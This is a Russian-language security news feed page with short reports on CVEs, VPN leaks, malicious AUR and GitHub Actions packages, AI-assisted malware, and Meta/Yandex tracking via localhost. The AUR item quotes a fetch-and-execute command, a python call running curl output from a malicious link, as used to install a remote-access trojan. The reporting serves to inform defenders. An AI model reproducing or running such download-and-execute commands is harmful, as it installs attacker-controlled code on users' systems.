Всего сообщений: 590
Платформа для совместной разработки GitLab сообщила об устранении критической уязвимости, получившей идентификатор CVE-2025-6454. Проблема затронула серверные инсталляции Community и Enterprise Edition и позволяла выполнять запросы к внутренним ресурсам через специально сформированные заголовки веб-хуков.
( читать дальше... )
>>> Подробности
Ведущий блога Anagogistis, обнаружил серьёзные уязвимости в Linux-клиентах PureVPN, которые подрывают базовые гарантии анонимности и защиты трафика. Проблемы затрагивают как графическую версию (2.10.0), так и консольную (2.0.1). Обе были протестированы на Ubuntu 24.04.3 LTS.
Главная брешь связана с тем, что при переподключении к Wi-Fi или выходе системы из спящего режима реальный IPv6-адрес пользователя становится видимым. В консольном клиенте с активированной функцией Internet Kill Switch сервис автоматически сообщает о восстановлении соединения, но в это время система получает маршруты IPv6 через Router Advertisements, и пакеты начинают уходить в обход VPN-туннеля. Так как политика ip6tables по умолчанию остаётся в состоянии ACCEPT, трафик свободно покидает компьютер напрямую.
GUI-клиент добавляет ещё больше риска. При разрыве соединения он корректно блокирует IPv4 и выводит уведомление о потере сессии, но при этом IPv6-трафик продолжает передаваться без ограничений до тех пор, пока пользователь вручную не нажмёт кнопку Reconnect. Таким образом, остаётся значительный временной промежуток, когда данные уходят в открытый интернет.
Не менее опасен и способ, которым клиент работает с настройками брандмауэра.
( читать дальше... )
>>> Подробности
В сеть утекли свыше 500 ГБ внутренних данных «Великого китайского файрвола».
В Китае произошла крупнейшая в истории утечка данных системы, известной как «Великий китайский файрвол». Как подтвердили независимые исследователи, в открытый доступ попало свыше 500 ГБ внутренних документов, включая исходный код, рабочие журналы и рабочие сообщения, относящиеся к этой системе.
Сообщается, что в утечке содержатся полные сборочные материалы для платформы глубокого анализа пакетов (DPI). Они раскрывают архитектуру коммерческой платформы Tiangou, которая позволяет провайдерам и пограничным шлюзам выявлять и блокировать инструменты обхода цензуры, такие как VPN, SSL-фингерпринтинг и регистрация сессий.
Документы свидетельствуют, что данная система развернута в 26 дата-центрах Мьянмы, где используется для мониторинга более 81 млн одновременных TCP-соединений и массовой блокировки контента.
Известно, что архив был скопирован хакерскими группами, в том числе Enlace Hacktivista
>>> Подробности
Специалисты компании GitGuardian зафиксировали масштабную целенаправленную атаку на пользователей GitHub. В результате злоумышленники получили доступ к 327 аккаунтам, через которые было внедрено вредоносное поведение в 817 репозиториев. Они подменяли GitHub Actions — автоматизированные скрипты, используемые в процессе CI/CD — вставляя вредоносные обработчики, собирающие чувствительную информацию.
В ходе атаки произошла утечка как минимум 3325 секретов, включая ключи доступа к сервисам PyPI, GitHub, NPM, DockerHub и различным облачным хранилищам. Данные передавались через переменные окружения, используемые в процессе автоматической сборки и тестирования проектов.
( читать дальше... )
Спустя семь лет разработки представлена версия LKRG 1.0.0. LKRG (Linux Kernel Runtime Guard) — модуль ядра Linux, предназначенный для проверки целостности ядра во время его работы и для обнаружения попыток использования уязвимостей.
( читать дальше... )
Специалисты из компании ESET сообщают, что новый вирус PromptLock запускает AI-модель gpt-oss:20b локально на зараженном девайсе, чтобы помочь генерировать вредоносный код с использованием жестко закодированных текстовых подсказок, хотя это может быть лишь проверкой концепции.
( читать дальше... )
>>> Подробности
С сентября 2026 года в ряде стран (Бразилия, Сингапур, Индонезия, Таиланд) будет запрещено устанавливать неподписанные приложения в Android. Разработчикам приложений потребуется регистрироваться в Google с предоставлением адреса, телефона, и, вероятно, скана паспорта или другого официального документа. Предлагаемая мера призвана бороться с malware, устанавливаемым пользователями самостоятельно со случайных сайтов из Интернета.
С 2027 года планируется распространить эту практику на остальные страны.
На конференции DEF CON 33 представлен метод атаки на браузерные дополнения, подставляющие свои элементы интерфейса в просматриваемую страницу. Применение атаки к дополнениям с менеджерами паролей может привести к утечке хранимой в менеджерах паролей информации, такой как параметры аутентификации, параметры кредитных карт, персональные данные и одноразовые пароли для двухфакторной аутентификации. Проблема затрагивает все протестированные менеджеры паролей, включая 1Password, Bitwarden, LastPass, KeePassXC-Browser, NordPass, ProtonPass и Keeper.
( читать дальше... )
Proton Authenticator — это бесплатное и открытое приложение для безопасной двухфакторной аутентификации от создателей ProtonMail и ProtonVPN.
С помощью 2FA вам нужно будет ввести вторую часть информации, помимо пароля, при входе в аккаунт. Обычно это шестизначный код, сгенерированный вашим приложением-аутентификатором. Даже если кто-то знает ваш пароль, он не сможет получить доступ к вашему аккаунту. Хотя SMS-коды аутентификации являются еще одним распространенным вариантом, они остаются уязвимыми для атак с подменой SIM-карты. Приложение-аутентификатор гораздо сложнее взломать, так как оно генерирует коды локально на вашем устройстве, и каждый код истекает через 30 секунд.
Основные преимущества:
>>> Подробности
По информации команды Nextron Systems, в течение года вредоносный модуль под названием Plague оставался незаметным для средств защиты Linux-систем, несмотря на его активное распространение и глубокую интеграцию в критическую часть системы — стек аутентификации. Обнаружить его удалось лишь благодаря анализу артефактов, загруженных на VirusTotal в конце июля 2024 года. Ни один из них до сих пор не распознан антивирусами как угроза, что указывает на крайне высокий уровень маскировки и осторожности разработчиков.
( читать дальше... )
>>> Подробности
С 1 августа 2025 года становятся обязательными требования к кибербезопасности Европейского Союза, ранее изложенные в документе «Radio Equipment Directive (RED) 2014/53/EU».
( читать дальше... )
Samsung уже отключили возможность разблокировки загрузчика в обновлении OneUI 8, следуя новым правилам.
В репозитории AUR (Arch User Repository), были обнаружены пакеты содержащие вредоносный код, интегрированные в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад трём вредоносным пакетам с браузерами, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.
В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда ‘python -c «$(curl вредоносная ссылка)»’, загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.
Вредоносный пакет был загружен позавчера и был удалён администраторами AUR через несколько часов после появления. Почти сразу после удаления этого вредоносного пакета в AUR были загружены два вредоносных пакета - «chrome» и «chrome-bin», содержащие аналогичный сценарий установки вредоносного ПО на систему пользователя.
Следом было выявлено ещё три пакета с вредоносным кодом: ttf-mac-fonts-all, ttf-ms-fonts-all и gromit.
>>> Подробности
Компании Meta* и Yandex уличили в скрытом отслеживании пользователей и манипуляциях для обхода предоставляемых браузерами средств обеспечения конфиденциальности, таких как режим инкогнито и возможность очистки Cookie. Активность по деанонимизации сеансов применялась на платформе Android при открытии сайтов, использующих системы web-аналитики Яндекс Метрика или Facebook Pixel.
Суть использованного метода идентификации сводится к тому, что распространяемые Meta и Yandex мобильные приложения для Android, такие как Facebook, Instagram, Yandex Maps, Yandex Navigator, Yandex Search, Yandex Go: Taxi Food и Yandex Browser, создавали дополнительный канал связи с выполняемым в браузере JavaScript-кодом. Мобильные приложения запускали отдельные обработчики соединений на локальном сетевом интерфейсе (127.0.0.1), принимающие запросы по протоколам HTTP, HTTPS, WebSocket и WebRTC.
При открытии в браузере сайтов, использующие системы web-аналитики Yandex Metric или Facebook Pixel, связанный с данными системами JavaScript-код отправлял запросы на открытые мобильными приложениями сетевые порты. В запросах передавались метаданные, Cookie и управляющие команды. В мобильных приложениях браузерные сеансы связывались с реальными идентификаторами пользователя и устройства, к которым имели доступ приложения. Например, сеансы могли связываться с учётными записями в Facebook и Yandex или с идентификаторами AAID (Android Advertising ID). Таким образом, даже при открытии сайта в режиме инкогнито или после удаления Cookie, сервисы Meta и Yandex могли точно идентифицировать пользователя, открывшего сайт, привязываясь к идентификаторам из мобильных приложений, запущенных на том же устройстве.
Реализованная техника представляла опасность не только из-за утечки информации в Facebook и Yandex, но и из-за возможности использования вредоносными приложениями. Сетевые порты, на которые отправлялись сведения об активности в браузере, могли использовать любые приложения для отслеживания активности пользователя и построения истории посещений, а не только приложения Facebook и Yandex.
Компании Facebook и Yandex воспользовались тем, что платформа Android не ограничивает создание слушающих сокетов в привязке к интерфейсу loopback (127.0.0.1), если приложение имеет полномочия INTERNET. В случае Facebook локальному приложению передавалось содержимое Cookie «_fbp» (уникальный идентификатор пользователя в Facebook Pixel). Через манипуляции с WebRTC содержимое подставлялось в поле «ice-ufrag» пакетов SDP, отправляемых в STUN-запросах на локальный хост. 17 мая в Chrome была заблокирована подобная возможность и скрипты Facebook Pixel перевели на использование WebRTC TURN. После раскрытия результатов исследования компания Meta удалила из скриптов Facebook Pixel отправку запросов на localhost.
В Яндекс метод отправки данных из браузера в мобильные приложения применялся с 2017 года. JavaScript-код сервиса Yandex Metrica устанавливал HTTP- или HTTPS-соединение с localhost по сетевым портам 29009, 29010, 30102 и 30103. Обращения отправлялись на сайт yandexmetrica.com, доменное имя которого резолвилось в IP-адрес 127.0.0.1. Информация о сетевых портах, на которых мобильные приложения Yandex должны были открыть слушающие сокеты, подгружалась динамически через запрос к хосту startup.mobile.yandex.net.
Сервер также передавал параметр first_delay_seconds, содержащий задержку перед запуском сетевых сервисов (приложения начинали принимать соединения не сразу после установки, а примерно через три дня). В ответ на HTTP-запрос мобильное приложение возвращало набор данных, включающий идентификаторы в сервисах Yandex, системные UUID и AAID (Android Advertising ID). JavaScript код Yandex Metric переправлял полученные идентификаторы на сервер mc.yango.com.
Упомянутые методы передачи данных работали в версиях Chrome и Edge для Android. В Firefox работал только метод Yandex. В DuckDuckGo и Brave отправка запросов к localhost блокировалась или требовала ручного подтверждения операции. В представленном в конце мая выпуске Chrome 137 была добавлена защита от подстановки данных в SDP.
*компания МЕТА и Facebook запрещены на территории РФ (тьфу тьфу тьфу на них окаянных).
Команда разработчиков curl выпустила обновление для устранения уязвимости CVE-2025-5025, оцененной как средней (Medium Severity).
Уязвимость проявляется при выполнении трех условий:
1. Используется TLS-библиотека wolfSSL
2. Соединение устанавливается по протоколу HTTP/3 (QUIC).
3. Включена функция безопасности certificate pinning (пиннинг публичного ключа сертификата сервера).
( читать дальше... )
>>> CVE-2025-5025
Исследователи из команды Google Security Team обнаружили уязвимость в процессорах AMD Zen 1-4, которая позволяет злоумышленникам с привилегиями локального администратора загружать вредоносные микрокоды. Эта уязвимость связана с использованием небезопасной хеш-функции при проверке подписи микрокодов.
Согласно сообщению Google, уязвимость позволяет злоумышленникам компрометировать конфиденциальные вычислительные нагрузки, защищенные технологией AMD Secure Encrypted Virtualization (SEV-SNP), а также нарушить динамическое измерение корневого доверия (Dynamic Root of Trust Measurement).
( читать дальше... )
>>> Подробности
Цель разработки компилятора – полная совместимость с синтаксисом языков Си и С++ при обеспечении полной безопасности работы с памятью. Заявляется, что для использования достаточно пересобрать существующий код, так уже компилируются и работают bzip2, zip, pcre и ncurses. С незначительными модификациями поддерживается сборка OpenSSH, OpenSSL, CPython, SQLite, Lua, Curl, Lynx, jpeg6b, zsh, xzutils и simdutf.
( читать дальше... )
>>> Подробности
Команда Manjaro Linux начала тестирование сервиса MDD (Manjaro Data Donor) для сбора данных о пользователях и отправки их на внешний сервер проекта.
Изначально планировалось, что эта функция будет включена по умолчанию, но это решение столкнулось с возражением других мейнтейнеров проекта. По информации на данный момент, телеметрия появится в виде опции, требующей согласия пользователя при первом запуске ОС.
( читать дальше... )
>>> Подробности
Исследователи из Gen Threat Labs выявили новый сложный руткит Snapekit, который нацелен на систему Arch Linux версии 6.10.2-arch1-1 на архитектуре x86_64. Snapekit позволяет злоумышленникам получать несанкционированный доступ к системе и управлять ею, при этом оставаясь незамеченными.
( читать дальше... )
В сентябре 2024 года была выявлена критическая уязвимость CVE-2024-8767 (оценка 9.9 по CVSS), затрагивающая плагины Acronis Backup на платформах cPanel, WHM, Plesk и DirectAdmin, работающих на Linux. Проблема заключается в избыточных привилегиях, что позволяет злоумышленникам удалённо раскрывать и изменять конфиденциальные данные, а также выполнять несанкционированные операции. Уязвимость поражает сборки плагинов до 619 (cPanel), 555 (Plesk) и 147 (DirectAdmin). Важность обновления нельзя недооценивать: пользователи, не установившие патчи, рискуют полной компрометацией системы.
Эксперты по безопасности настоятельно рекомендуют обновить системы как можно скорее, особенно если плагины Acronis Backup используются для защиты критически важных данных.
>>> Подробности
В Ubuntu 24.10, релиз которой запланирован на 10 октября 2024 года, появится функция запросов на разрешения, которая позволит пользователям контролировать доступ приложений к системным ресурсам.
Она позволит пользователям контролировать, управлять и лучше понимать поведение приложений, работающих на их устройствах. Основой для этой технологии послужила реализация AppArmor в Ubuntu, которая предоставляет тонко настраиваемый контроль доступа к приложениям без необходимости вносить изменения в их исходный код.
Оливер Смит, временно исполняющий обязанности директора по разработке Ubuntu Desktop в компании Canonical, заявляет: «Запросы разрешений, опираясь на AppArmor, усиливают изоляцию приложений и управляют доступом на уровне системных вызовов, чтобы каждое действие было под строгим контролем и требовало согласия пользователя, даже если приложение не осведомлено об этом процессе».
Основными элементами нововведения станут два предустановленных пакета: графический интерфейс под названием Security Center и командная утилита prompting-client. Эти инструменты будут задействовать новые функции, реализованные в snapd 2.65 и AppArmor 4.0. Через приложение Security Center пользователи смогут управлять правилами запросов на своём рабочем столе Ubuntu, а будущие обновления добавят ещё больше функций, таких как управление шифрованием и настройка брандмауэра.
Функция запросов разрешений будет запущена в экспериментальном режиме.
Для установки новой функции потребуется выполнить следующие команды:
snap refresh snapd --channel=candidate
snap install desktop-security-center
snap install prompting-client
>>> Подробности
| следующие → |